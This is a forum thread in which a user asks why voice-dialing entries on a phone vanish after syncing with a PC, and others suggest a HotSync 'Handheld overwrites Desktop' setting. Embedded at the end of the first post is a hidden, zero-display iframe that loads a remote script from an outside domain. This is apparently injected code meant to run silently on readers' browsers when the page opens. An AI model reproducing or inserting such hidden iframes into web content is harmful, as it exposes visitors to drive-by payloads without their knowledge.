Question 7135 voice dial

I am testing this phone, and other than the battery life have only come across one issue. Whenever I sync with my pc, I lose all voice dialing entries that I have input. Has anyone got an idea how to avoid losing them? Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Open up your Hotsync Custom windows and make sure "System" is set to "Handheld overwrites Desktop". If it isn't, make it so and don't forget to click "Set as Default" before hitting OK.

Let us know if that solves it for ya...

It was set that way, and I tried a few more times before it worked, and it has ever since. I must have changed something else but I don't know what. Anyway, thanks for the help.

One thing I've noticed is that if a bit or two of memory gets "dirty" (for lack of a better term), changing a setting and then setting it back will "make it right". This is probably what happened to you (I've had it happen a couple of times with other settings, as well as on my PCs). Glad to hear it worked out for you...
